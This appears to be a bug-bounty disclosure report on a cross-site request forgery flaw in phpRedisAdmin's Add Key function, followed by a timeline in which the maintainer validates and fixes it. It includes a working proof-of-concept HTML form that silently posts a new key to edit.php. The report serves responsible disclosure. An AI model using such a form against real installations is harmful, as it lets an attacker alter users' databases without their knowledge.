We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin

Valid

Reported on

Aug 23rd 2021

✍️ Description

The Add Key functionality in the Application is vulnerable to CSRF attack.

🕵️‍♂️ Proof of Concept

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://domain.tld/phpRedisAdmin/edit.php?view&s=1&d=0&key=testkey1" method="POST">
<input type="hidden" name="type" value="string" />
<input type="hidden" name="key" value="testkey13" />
<input type="hidden" name="hkey" value="" />
<input type="hidden" name="index" value="" />
<input type="hidden" name="score" value="" />
<input type="hidden" name="value" value="testval1" />
<input type="hidden" name="oldvalue" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

This vulnerability can let an attacker add data to the database without the knowledge/interaction of the user. 📍 Location index.php#L1 📝 References Cross-site request forgery (CSRF)

Occurrences

Melbin Mathew Antony modified the report
2 years ago
We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 2 years ago
erikdubbelboer/phpredisadmin maintainer
2 years ago

Fixed in https://github.com/erikdubbelboer/phpRedisAdmin/commit/b9039adbb264c81333328faa9575ecf8e0d2be94

Melbin
2 years ago

Researcher

Hi, please mark the vulnerability as validated and fixed. Thanks

Erik Dubbelboer validated this vulnerability 2 years ago
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
Erik Dubbelboer marked this as fixed with commit b9039a 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation